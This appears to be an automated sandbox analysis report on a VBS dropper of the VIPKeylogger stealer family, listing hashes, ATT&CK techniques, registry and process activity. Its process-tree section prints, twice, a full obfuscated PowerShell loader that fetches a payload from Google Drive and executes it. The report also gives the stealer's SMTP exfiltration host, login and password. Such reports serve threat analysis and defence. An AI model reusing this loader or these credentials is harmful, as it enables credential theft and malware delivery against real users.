vipkeylogger | 5609778f25f27c804c0d386b69c9a0fd5fb05dde185886d3d17547ff50adf237

General

Target

CONSTRUCCIONESE.C.CASASS.L.ARTCULOSENORDENDECOMPRALISTAADJUNTA.vbs
Size

26KB
MD5

4fd80976e70f4d1bb775d5226e33f2d4
SHA1

67110d81f628a445ab14a235f432f4723272340a
SHA256

5609778f25f27c804c0d386b69c9a0fd5fb05dde185886d3d17547ff50adf237
SHA512

c148d327a2338f5f678c30fddfe3d6a808255f145c145f5a9f4250a1f1de5214740b37aef037ead8a14e6f522000b305ae62763029c38f490cad879e4d933a97
SSDEEP

192:bmRhBwAQ2p8gDxl7me/J9qG9NKV8+Eha3vqVHGDvSJNDmJBj+I4yS4Hm8KqcVOaO:6ke1dmidc9vyZmJsbySX8NHbrBvN1TWm

Score

10^/10

vipkeylogger collection discovery keylogger stealer

Malware Config

Extracted

Family

vipkeylogger

Credentials

Protocol: smtp
Host:
mail.amenitieshotel.com
Port:
587
Username:
[email protected]
Password:
HeibaPaco
Email To:
[email protected]

Signatures

VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
stealer keylogger vipkeylogger
Vipkeylogger family
vipkeylogger

Blocklisted process makes network request 11 IoCs

flow	pid	Process
3	3416	WScript.exe
25	4312	powershell.exe
27	4312	powershell.exe
42	2456	msiexec.exe
44	2456	msiexec.exe
46	2456	msiexec.exe
51	2456	msiexec.exe
52	2456	msiexec.exe
57	2456	msiexec.exe
59	2456	msiexec.exe
63	2456	msiexec.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
25	drive.google.com
42	drive.google.com
24	drive.google.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
56	checkip.dyndns.org

Network Service Discovery 1 TTPs 2 IoCs

Attempt to gather information on host's network.

discovery

Network Service Discovery

T1046

pid	Process
4312	powershell.exe
4052	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
2456	msiexec.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
4052	powershell.exe
2456	msiexec.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	msiexec.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
4312	powershell.exe
4312	powershell.exe
4052	powershell.exe
4052	powershell.exe
4052	powershell.exe
2456	msiexec.exe
2456	msiexec.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
4052	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4312	powershell.exe
Token: SeDebugPrivilege	4052	powershell.exe
Token: SeDebugPrivilege	2456	msiexec.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3416 wrote to memory of 4312	3416	WScript.exe	89
PID 3416 wrote to memory of 4312	3416	WScript.exe	89
PID 4052 wrote to memory of 2456	4052	powershell.exe	104
PID 4052 wrote to memory of 2456	4052	powershell.exe	104
PID 4052 wrote to memory of 2456	4052	powershell.exe	104
PID 4052 wrote to memory of 2456	4052	powershell.exe	104

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	msiexec.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\CONSTRUCCIONESE.C.CASASS.L.ARTCULOSENORDENDECOMPRALISTAADJUNTA.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3416
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Kodebaand genbankers Spradebassen Ambiversion Udfyldning Tankeren #>;$Sykes='Forskelsbehandling85';<#Fuldfashioneret Hjertekardiograms Raadsmedlemmer #>; function Camelishness173($gomphosis){If ($host.DebuggerEnabled) {$Unafflictednessrakiske++;}$Brler=$Ptolemaean+$gomphosis.'Length' - $Unafflictednessrakiske; for ( $Unafflictedness=5;$Unafflictedness -lt $Brler;$Unafflictedness+=6){$Flagellantens=$Unafflictedness;$Autoradiographic+=$gomphosis[$Unafflictedness];}$Autoradiographic;}function Fortvivler($Elegisk){ .($Tennies) ($Elegisk);}$Formlendes=Camelishness173 'A legM Br ao kllizAnhydiAfblelKontrlBlankaAfrus/Anecd ';$Multisonous=Camelishness173 'Skul TB,liglKo tes ejtr1Guari2 Fina ';$Unafflictednesssskabs='Baadt[BikinNNcarnEMotorTEpith. ,etrSP nesEP.shfrSkywaVUndisiBernicRianceBan ePRenonORepetiVol.eNB.amrTHom lmErk.rABeti,NMul.iaAttraG.alanE verRDec s]Pjal :bolig:HaaneS Und,eHderlcmu.tuUOldenRSkinsIJassiTUdaany k nepSal,nRBeto oUbndiTSowteOMen.nc ltesokor eL Tred=Kerne$ForhumSrbehUHe.atlKnittTDiarii LooesHvoreOCostlNVentrOCheerU SixesJuste ';$Formlendes+=Camelishness173 'Skrmf5Heter.Attri0Li je Spora(Gla eWcomesiOvernn DougdRu,eboOvertw PicksD tab FyrvrN C llTGlans Dact 1Asfal0Skrat.Overa0Fussy;Nonco MikseWSkotjiSnittnToast6Unfeu4Justi; Sko ArvelxArau 6Entic4 efte;Lgemi Ki,ter Nesnv.eust:Greyn1Uforu3Omsor1.arsi.Amorb0Skae.)Stich BlodGAgr le Sdm ctronbk,linsoEu,en/Uforu2Grafo0Carru1haard0Befor0Livsa1G,ara0.uffa1Snder GangsF .nipi Meder orrieNul,ef SympoKohorxHa vt/Baksn1S emp3Ta to1Subbu.Lumsk0Ball, ';$unappreciativeness=Camelishness173 'Daak.UOsheas VersEElemerSw.at-Da spaShackgresiaECl tuNBenfrtOtola ';$Haugen126=Camelishness173 'celsihOpstvtUnglotTipsipR eddsJust,:Unsym/Grund/Der,vdTamborSpilli BaccvFletneMerid.FennogPeptoo AffooPlum,gAfpr,l,yrogeMai,c. popucSte eounsogmEmb o/bloatuDispacPremi?unstreSide xBasi p CommoKri,srPolemtDatte=Lokald DataoTangewnordmnunneclInkvioAnn raSkr ld Tryk&VotreiWoolsd Mour= Fore1 NympEKugleb olospP,opprPenibN.nticXBlentUAffa D ,ntiwLikvivPliedzRabbigDi,doFM skiQcharmk agejFireb7Un issDis eUK gjoLAngelJUdvik-Pla egRejseV Ekse9ForbrQDyb,rF Jo dsMerelvHamulgS.cialFof rcoverp ';$Unafflictednessmpressionistically=Camelishness173 'Ejaku>Forg, ';$Tennies=Camelishness173 '.iltaiGa tre irkeXRatsl ';$Fireblokkes='Kyllingefarme';$Spahis='\Abets.uso';Fortvivler (Camelishness173 'Man,f$ ToxyG astL.onfaODnge b emanaBorgelGdnin: UnruaAc rbcAa niEA romT GrupoBrovtn T.lryUndvrl Pred=Enth,$Fag,reTocylNkow ov Krea:BrndeAU scoP O faPTaffeDAsheraUnopetFissiATatov+Tidsa$PyrensSournphvirva eredhFl ntILemlsS aflo ');Fortvivler (Camelishness173 'despo$BibligBasi.LBr,ehoHeptab Pie a ybeglPanda:NonpeuIntorN .irtP Hje.u .eksr Gen pAllero ico SOtte,eMohatL erebiNummuk mindE Mo e3 Befr5Sande=Repra$ raflh lutsaLackwu GeorG RealEKokusNBront1B omk2wande6Satyr.kookySCo.ntpForstlAf liISpuleTDo me(Unmer$GorgouScattNb.gplami,iefKuperfElleslAkadeIE dokCTeethtMelone UdrudJogu N StereCha psInci sTeglsm BullP ,lisRBrodneLerk,sdisfesInflaIAscenOPortvNMicroi DispSSte ftKana I Pe,vCPneumaMonopl BabbLBlastyMisva)Hocks ');Fortvivler (Camelishness173 $Unafflictednesssskabs);$Haugen126=$Unpurposelike35[0];$Scabiophobia=(Camelishness173 'skra $PhenoGByplal einOMrenebCyke A WoolL Fo e:LavtlI Pat c Semeo Fi,tNMe dlIWomancSl kn1,horo0kore 6Recon=Tu.isNRe.teeTugtiWHecto-VideroValglB BrugJS,blee StrecVardet Ba t subpiSLarynyVandrsDebu T OverESkydem Chan.F.aadnOctopeSrgettForge.BisquWSpndiECephaBPr jeCLap,rlBeatiIAposte BlodN ektot S,mi ');Fortvivler ($Scabiophobia);Fortvivler (Camelishness173 'Vetch$EmnedISubdecCaratomatrinTere iLuxurcVestm1Skrmb0 Nyhe6Skurr.BeatgH llee Be uabri edWrix.eMass rAl basBemr [Fillb$Quiffu DeccnAgernaStamspNonsopFldesrSpilveFjerkcNegliiRe.ktaRerantReindi Su pv ,arme JenlnGast.eAfslusXerodsDel o].oono= Pege$DisciFFork oB lysrRygermStriplForske SvovnkirkedDatasePaatrs aleb ');$Torskegildets132=Camelishness173 'Skspo$UnharIEfterc Alewo Cop n utili dourcRsken1Unrem0In,or6Jvner. yleDAfh lo al owVenatn Drypl nsceoUoveraB,casd,affeFM skmi ymarlDulcieNonsu(u fak$ olasHfermaa ,orku scengProlieNonjon izzo1Halet2Yoyoe6Ne.to,Fag i$SlaegT LawnhFlgeseVarmeoKontrlMonomo Ophrg Ineua uliml hila) Svin ';$Theologal=$Acetonyl;Fortvivler (Camelishness173 'Desal$bankrGF redl FyreOFyr sBM,rkeAVenteL Para:Misc H CoveATraceMSkoleMNo neEBluf.rKlimpSDowngtAnthrOUnrelnKnaseEDisru=Morni( itanTFraseEUdskrsBip,rt Efte-RepeapIstnia DereTPariaHR sid Emanc$SkuldtIsocrherectE ekstOBeraal endeODisplgTournAAgentlUnder) ,rot ');while (!$Hammerstone) {Fortvivler (Camelishness173 'Reakt$ReclugEvi ilBildro stegbOplagaVisuel Rei.:skarpKT,ldioVanilaKr dig Fo,luGce llLeucoe TemprPerleiPlatenreichg TempsSvang=Hirsh$OtocotU.trar k rruAfha ePurpu ') ;Fortvivler $Torskegildets132;Fortvivler (Camelishness173 ' biblsHenreTCheirakarierJohanTHipes-SubtrsPrizelSmrsoe FlnsEMargaPTecal Cunn 4Affot ');Fortvivler (Camelishness173 'Mon r$LapargVenezlSeksdO To.nbPorreaAffillHit i: S peHBed kaBespymBevismTh rmeTalloRRegniS Arb,tSta.lOGyokuNSlfanEIdent= lamb(IntagtvildlEMaaneSCurviTHjert-Pneu PArgumAStifttTurisHIsvrk Tanke$ r,nktEndamhOp raeAncieoPen,iL HaveOAppreGTmrera c opL Unik) Gh t ') ;Fortvivler (Camelishness173 'Infor$ FonogthorgLO,erloApollbNo,maAI,humL Semi:Aqu,tN UsurOS nbaN ScleIConfunFactiHBevidEParalrHavere SubtnPomicT Mamm=Om.al$arbejgBlo.hlAfmarO ndfiB nsomA weeLSipho:Embles SaucP CaroO YaffN Sto TRydniaHanneNSttemeP,laei illotHaralEKirketRunddeEmpl.NEvner+L pho+Likvi%cloot$B spnuVilnanVersipQurtiuThigmrXanthp eonloReusasFas feTilbel FjoriMerchk ervEB.ito3 Wide5 Ball.La ghc andfOI dusUTonstNVibr tAdr s ') ;$Haugen126=$Unpurposelike35[$Noninherent];}$Nephrocystosis=319219;$Unafflictednesscefish=32753;Fortvivler (Camelishness173 'Rvegr$SpandGStempLBiot,oRerisB Te saFej,tLFlyve:PresstFiltraIhndeRreddei AlcaF.mslaeE otirSkareEUnre.TSkrav Roten=Respe NiveGA boleStenbT Sa r-Uforkc athoo gglun BeneT.railEIrr vN Dkspt Unsw Resid$B.izzTBurs,hIndbeESkipkO StikLSh nio Sub,gSkovmA RuinL onio ');Fortvivler (Camelishness173 'Incoe$Pa tig To slBlo,doInterb andaaCr.nnlBi.or:VoyanBTeksteFrikoeFunktlHjlpeo DevolOver Spino=Para. Fo.st[InterSadel yKatassGrivotUrolueCongemClums.KandeCUdrkeoPriornTot kvChloreLeaserfo vetMonog]Lbsuk:Skriv: UdveFGela r,lveooOppormFininB dkraDoddeschokoeBortl6Nymss4 AffaSDykket Ort,r onjuireprsnRystegJ,dit(Pubbe$ Ch,rTTrideaGenanrPlatfihelonfWiseaeDeconrBlidheD postGrun,)P rpe ');Fortvivler (Camelishness173 'katac$JournGponerlAmbieoBilagBAfteratabullOm st:DobsoSLe vaTConsuA Bed b F rts Misbtanti,ASemi,mMeda B S mpUApollre ocaSEmpr Admir=Outsi Mydau[Gloo sGulvmy drus De,iTUnd feOenskMUkvem.klatrTEnfamEU lebxHolomtsanat.Ri,ocE vfldnPilg,c DiftOVektodBortrIB tleNAbdi GC sco]Mod s:Midsh:Ta feaDem nS OvercFlygti s.afIObjek.skue GNemalENonskT aktiS Af itStudir .tudI Vowen De.oGMyldr( Litu$ emibSvrvgEBooteEErratL Priso RefiL Leks)Granu ');Fortvivler (Camelishness173 ' olin$SkibsGSem,elGranto ServBBrudfaArchalFasei: DevamKrngnIPansrL Fil dAzot TV ded=Bunya$ Kom.S eastTruckAAnlgsb LurcsSerisTHvneda RailmThermb AdhiUugek RRhinoS Sort.OligoSJameyu Yn sBDeko,sSmreft StrorSol ai RoboNF.rveGNeura(Attr.$KaotinLeashES,oryPmegalH SkikRForudoMisteCDeodoyBonitS,nergT pando DombSunderI,ecans Ding,Itera$fondsU FiltnM ntaa AdapFTudemfU collAjo si,ickscmo getFluorE OpheDUpchanBedlae TarmsUtil.SFrivrCEtfagealpetfRe noIMellesSighthPr te)Scene ');Fortvivler $Mildt;"
  2⤵
  - Blocklisted process makes network request
  - Network Service Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4312

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Kodebaand genbankers Spradebassen Ambiversion Udfyldning Tankeren #>;$Sykes='Forskelsbehandling85';<#Fuldfashioneret Hjertekardiograms Raadsmedlemmer #>; function Camelishness173($gomphosis){If ($host.DebuggerEnabled) {$Unafflictednessrakiske++;}$Brler=$Ptolemaean+$gomphosis.'Length' - $Unafflictednessrakiske; for ( $Unafflictedness=5;$Unafflictedness -lt $Brler;$Unafflictedness+=6){$Flagellantens=$Unafflictedness;$Autoradiographic+=$gomphosis[$Unafflictedness];}$Autoradiographic;}function Fortvivler($Elegisk){ .($Tennies) ($Elegisk);}$Formlendes=Camelishness173 'A legM Br ao kllizAnhydiAfblelKontrlBlankaAfrus/Anecd ';$Multisonous=Camelishness173 'Skul TB,liglKo tes ejtr1Guari2 Fina ';$Unafflictednesssskabs='Baadt[BikinNNcarnEMotorTEpith. ,etrSP nesEP.shfrSkywaVUndisiBernicRianceBan ePRenonORepetiVol.eNB.amrTHom lmErk.rABeti,NMul.iaAttraG.alanE verRDec s]Pjal :bolig:HaaneS Und,eHderlcmu.tuUOldenRSkinsIJassiTUdaany k nepSal,nRBeto oUbndiTSowteOMen.nc ltesokor eL Tred=Kerne$ForhumSrbehUHe.atlKnittTDiarii LooesHvoreOCostlNVentrOCheerU SixesJuste ';$Formlendes+=Camelishness173 'Skrmf5Heter.Attri0Li je Spora(Gla eWcomesiOvernn DougdRu,eboOvertw PicksD tab FyrvrN C llTGlans Dact 1Asfal0Skrat.Overa0Fussy;Nonco MikseWSkotjiSnittnToast6Unfeu4Justi; Sko ArvelxArau 6Entic4 efte;Lgemi Ki,ter Nesnv.eust:Greyn1Uforu3Omsor1.arsi.Amorb0Skae.)Stich BlodGAgr le Sdm ctronbk,linsoEu,en/Uforu2Grafo0Carru1haard0Befor0Livsa1G,ara0.uffa1Snder GangsF .nipi Meder orrieNul,ef SympoKohorxHa vt/Baksn1S emp3Ta to1Subbu.Lumsk0Ball, ';$unappreciativeness=Camelishness173 'Daak.UOsheas VersEElemerSw.at-Da spaShackgresiaECl tuNBenfrtOtola ';$Haugen126=Camelishness173 'celsihOpstvtUnglotTipsipR eddsJust,:Unsym/Grund/Der,vdTamborSpilli BaccvFletneMerid.FennogPeptoo AffooPlum,gAfpr,l,yrogeMai,c. popucSte eounsogmEmb o/bloatuDispacPremi?unstreSide xBasi p CommoKri,srPolemtDatte=Lokald DataoTangewnordmnunneclInkvioAnn raSkr ld Tryk&VotreiWoolsd Mour= Fore1 NympEKugleb olospP,opprPenibN.nticXBlentUAffa D ,ntiwLikvivPliedzRabbigDi,doFM skiQcharmk agejFireb7Un issDis eUK gjoLAngelJUdvik-Pla egRejseV Ekse9ForbrQDyb,rF Jo dsMerelvHamulgS.cialFof rcoverp ';$Unafflictednessmpressionistically=Camelishness173 'Ejaku>Forg, ';$Tennies=Camelishness173 '.iltaiGa tre irkeXRatsl ';$Fireblokkes='Kyllingefarme';$Spahis='\Abets.uso';Fortvivler (Camelishness173 'Man,f$ ToxyG astL.onfaODnge b emanaBorgelGdnin: UnruaAc rbcAa niEA romT GrupoBrovtn T.lryUndvrl Pred=Enth,$Fag,reTocylNkow ov Krea:BrndeAU scoP O faPTaffeDAsheraUnopetFissiATatov+Tidsa$PyrensSournphvirva eredhFl ntILemlsS aflo ');Fortvivler (Camelishness173 'despo$BibligBasi.LBr,ehoHeptab Pie a ybeglPanda:NonpeuIntorN .irtP Hje.u .eksr Gen pAllero ico SOtte,eMohatL erebiNummuk mindE Mo e3 Befr5Sande=Repra$ raflh lutsaLackwu GeorG RealEKokusNBront1B omk2wande6Satyr.kookySCo.ntpForstlAf liISpuleTDo me(Unmer$GorgouScattNb.gplami,iefKuperfElleslAkadeIE dokCTeethtMelone UdrudJogu N StereCha psInci sTeglsm BullP ,lisRBrodneLerk,sdisfesInflaIAscenOPortvNMicroi DispSSte ftKana I Pe,vCPneumaMonopl BabbLBlastyMisva)Hocks ');Fortvivler (Camelishness173 $Unafflictednesssskabs);$Haugen126=$Unpurposelike35[0];$Scabiophobia=(Camelishness173 'skra $PhenoGByplal einOMrenebCyke A WoolL Fo e:LavtlI Pat c Semeo Fi,tNMe dlIWomancSl kn1,horo0kore 6Recon=Tu.isNRe.teeTugtiWHecto-VideroValglB BrugJS,blee StrecVardet Ba t subpiSLarynyVandrsDebu T OverESkydem Chan.F.aadnOctopeSrgettForge.BisquWSpndiECephaBPr jeCLap,rlBeatiIAposte BlodN ektot S,mi ');Fortvivler ($Scabiophobia);Fortvivler (Camelishness173 'Vetch$EmnedISubdecCaratomatrinTere iLuxurcVestm1Skrmb0 Nyhe6Skurr.BeatgH llee Be uabri edWrix.eMass rAl basBemr [Fillb$Quiffu DeccnAgernaStamspNonsopFldesrSpilveFjerkcNegliiRe.ktaRerantReindi Su pv ,arme JenlnGast.eAfslusXerodsDel o].oono= Pege$DisciFFork oB lysrRygermStriplForske SvovnkirkedDatasePaatrs aleb ');$Torskegildets132=Camelishness173 'Skspo$UnharIEfterc Alewo Cop n utili dourcRsken1Unrem0In,or6Jvner. yleDAfh lo al owVenatn Drypl nsceoUoveraB,casd,affeFM skmi ymarlDulcieNonsu(u fak$ olasHfermaa ,orku scengProlieNonjon izzo1Halet2Yoyoe6Ne.to,Fag i$SlaegT LawnhFlgeseVarmeoKontrlMonomo Ophrg Ineua uliml hila) Svin ';$Theologal=$Acetonyl;Fortvivler (Camelishness173 'Desal$bankrGF redl FyreOFyr sBM,rkeAVenteL Para:Misc H CoveATraceMSkoleMNo neEBluf.rKlimpSDowngtAnthrOUnrelnKnaseEDisru=Morni( itanTFraseEUdskrsBip,rt Efte-RepeapIstnia DereTPariaHR sid Emanc$SkuldtIsocrherectE ekstOBeraal endeODisplgTournAAgentlUnder) ,rot ');while (!$Hammerstone) {Fortvivler (Camelishness173 'Reakt$ReclugEvi ilBildro stegbOplagaVisuel Rei.:skarpKT,ldioVanilaKr dig Fo,luGce llLeucoe TemprPerleiPlatenreichg TempsSvang=Hirsh$OtocotU.trar k rruAfha ePurpu ') ;Fortvivler $Torskegildets132;Fortvivler (Camelishness173 ' biblsHenreTCheirakarierJohanTHipes-SubtrsPrizelSmrsoe FlnsEMargaPTecal Cunn 4Affot ');Fortvivler (Camelishness173 'Mon r$LapargVenezlSeksdO To.nbPorreaAffillHit i: S peHBed kaBespymBevismTh rmeTalloRRegniS Arb,tSta.lOGyokuNSlfanEIdent= lamb(IntagtvildlEMaaneSCurviTHjert-Pneu PArgumAStifttTurisHIsvrk Tanke$ r,nktEndamhOp raeAncieoPen,iL HaveOAppreGTmrera c opL Unik) Gh t ') ;Fortvivler (Camelishness173 'Infor$ FonogthorgLO,erloApollbNo,maAI,humL Semi:Aqu,tN UsurOS nbaN ScleIConfunFactiHBevidEParalrHavere SubtnPomicT Mamm=Om.al$arbejgBlo.hlAfmarO ndfiB nsomA weeLSipho:Embles SaucP CaroO YaffN Sto TRydniaHanneNSttemeP,laei illotHaralEKirketRunddeEmpl.NEvner+L pho+Likvi%cloot$B spnuVilnanVersipQurtiuThigmrXanthp eonloReusasFas feTilbel FjoriMerchk ervEB.ito3 Wide5 Ball.La ghc andfOI dusUTonstNVibr tAdr s ') ;$Haugen126=$Unpurposelike35[$Noninherent];}$Nephrocystosis=319219;$Unafflictednesscefish=32753;Fortvivler (Camelishness173 'Rvegr$SpandGStempLBiot,oRerisB Te saFej,tLFlyve:PresstFiltraIhndeRreddei AlcaF.mslaeE otirSkareEUnre.TSkrav Roten=Respe NiveGA boleStenbT Sa r-Uforkc athoo gglun BeneT.railEIrr vN Dkspt Unsw Resid$B.izzTBurs,hIndbeESkipkO StikLSh nio Sub,gSkovmA RuinL onio ');Fortvivler (Camelishness173 'Incoe$Pa tig To slBlo,doInterb andaaCr.nnlBi.or:VoyanBTeksteFrikoeFunktlHjlpeo DevolOver Spino=Para. Fo.st[InterSadel yKatassGrivotUrolueCongemClums.KandeCUdrkeoPriornTot kvChloreLeaserfo vetMonog]Lbsuk:Skriv: UdveFGela r,lveooOppormFininB dkraDoddeschokoeBortl6Nymss4 AffaSDykket Ort,r onjuireprsnRystegJ,dit(Pubbe$ Ch,rTTrideaGenanrPlatfihelonfWiseaeDeconrBlidheD postGrun,)P rpe ');Fortvivler (Camelishness173 'katac$JournGponerlAmbieoBilagBAfteratabullOm st:DobsoSLe vaTConsuA Bed b F rts Misbtanti,ASemi,mMeda B S mpUApollre ocaSEmpr Admir=Outsi Mydau[Gloo sGulvmy drus De,iTUnd feOenskMUkvem.klatrTEnfamEU lebxHolomtsanat.Ri,ocE vfldnPilg,c DiftOVektodBortrIB tleNAbdi GC sco]Mod s:Midsh:Ta feaDem nS OvercFlygti s.afIObjek.skue GNemalENonskT aktiS Af itStudir .tudI Vowen De.oGMyldr( Litu$ emibSvrvgEBooteEErratL Priso RefiL Leks)Granu ');Fortvivler (Camelishness173 ' olin$SkibsGSem,elGranto ServBBrudfaArchalFasei: DevamKrngnIPansrL Fil dAzot TV ded=Bunya$ Kom.S eastTruckAAnlgsb LurcsSerisTHvneda RailmThermb AdhiUugek RRhinoS Sort.OligoSJameyu Yn sBDeko,sSmreft StrorSol ai RoboNF.rveGNeura(Attr.$KaotinLeashES,oryPmegalH SkikRForudoMisteCDeodoyBonitS,nergT pando DombSunderI,ecans Ding,Itera$fondsU FiltnM ntaa AdapFTudemfU collAjo si,ickscmo getFluorE OpheDUpchanBedlae TarmsUtil.SFrivrCEtfagealpetfRe noIMellesSighthPr te)Scene ');Fortvivler $Mildt;"
1⤵
- Network Service Discovery
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4052
- C:\Windows\SysWOW64\msiexec.exe
  "C:\Windows\SysWOW64\msiexec.exe"
  2⤵
  - Blocklisted process makes network request
  - Accesses Microsoft Outlook profiles
  - Suspicious use of NtCreateThreadExHideFromDebugger
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - outlook_office_path
  - outlook_win_path
  PID:2456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

1

T1217

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
806286a9ea8981d782ba5872780e6a4c

SHA1
99fe6f0c1098145a7b60fda68af7e10880f145da

SHA256
cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713

SHA512
362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e01mdbwf.h4m.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Abets.uso

Filesize
458KB

MD5
55718a7f066f9de3abd7dceadaae15a5

SHA1
17941194df15a9c2bd5ac73b6072069c3602db74

SHA256
7de3df60cd7db586ee78216a5537787ab95531a90fd4c4fadb625819197ce809

SHA512
82e8e498490d16abe19b79842a8c39752b6627d89cc48e70c206dead9224e227405d7ec918318dc9f304481c23180c0939990255b62b205fff0e20ae0795a2e0

Download Submit
memory/2456-70-0x0000000022A60000-0x0000000022A6A000-memory.dmp

Filesize
40KB

Download
memory/2456-69-0x0000000022AB0000-0x0000000022B42000-memory.dmp

Filesize
584KB

Download
memory/2456-67-0x0000000022980000-0x00000000229D0000-memory.dmp

Filesize
320KB

Download
memory/2456-66-0x00000000231B0000-0x0000000023372000-memory.dmp

Filesize
1.8MB

Download
memory/2456-65-0x0000000022650000-0x00000000226EC000-memory.dmp

Filesize
624KB

Download
memory/2456-64-0x00000000010F0000-0x0000000001138000-memory.dmp

Filesize
288KB

Download
memory/2456-62-0x00000000010F0000-0x0000000002344000-memory.dmp

Filesize
18.3MB

Download
memory/4052-49-0x0000000008840000-0x000000000A9BA000-memory.dmp

Filesize
33.5MB

Download
memory/4052-46-0x0000000007030000-0x0000000007052000-memory.dmp

Filesize
136KB

Download
memory/4052-28-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/4052-29-0x0000000005700000-0x0000000005766000-memory.dmp

Filesize
408KB

Download
memory/4052-39-0x00000000057F0000-0x0000000005B44000-memory.dmp

Filesize
3.3MB

Download
memory/4052-26-0x0000000004EF0000-0x0000000005518000-memory.dmp

Filesize
6.2MB

Download
memory/4052-41-0x0000000005E30000-0x0000000005E4E000-memory.dmp

Filesize
120KB

Download
memory/4052-42-0x0000000005E60000-0x0000000005EAC000-memory.dmp

Filesize
304KB

Download
memory/4052-43-0x0000000007660000-0x0000000007CDA000-memory.dmp

Filesize
6.5MB

Download
memory/4052-44-0x00000000063D0000-0x00000000063EA000-memory.dmp

Filesize
104KB

Download
memory/4052-45-0x0000000007090000-0x0000000007126000-memory.dmp

Filesize
600KB

Download
memory/4052-27-0x0000000004E50000-0x0000000004E72000-memory.dmp

Filesize
136KB

Download
memory/4052-47-0x0000000008290000-0x0000000008834000-memory.dmp

Filesize
5.6MB

Download
memory/4052-25-0x0000000004880000-0x00000000048B6000-memory.dmp

Filesize
216KB

Download
memory/4312-4-0x00007FFB9FC83000-0x00007FFB9FC85000-memory.dmp

